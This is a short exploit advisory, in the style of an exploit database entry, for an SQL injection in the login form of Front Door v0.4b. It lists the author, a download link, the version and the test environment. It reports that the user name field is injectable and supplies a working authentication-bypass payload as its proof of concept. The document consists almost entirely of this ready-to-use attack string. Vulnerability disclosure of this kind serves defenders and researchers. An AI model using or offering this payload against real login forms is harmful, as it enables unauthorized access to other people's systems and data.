# Exploit Title: Front Door v0.4b SQL Injection Vulnerability # Date: March 12, 2010 # Author: Blake # Software Link: http://sourceforge.net/projects/frontdoor/files/Front%20Door%20-%20BETA/Front%20Door%20-%20v0.4b/frontdoor-v0.4b.rar/download # Version: 0.4b # Tested on: Windows XP SP3 with MySQL Login user name field is vulnerable to sql injection. POC: ' OR username IS NOT NULL OR username = '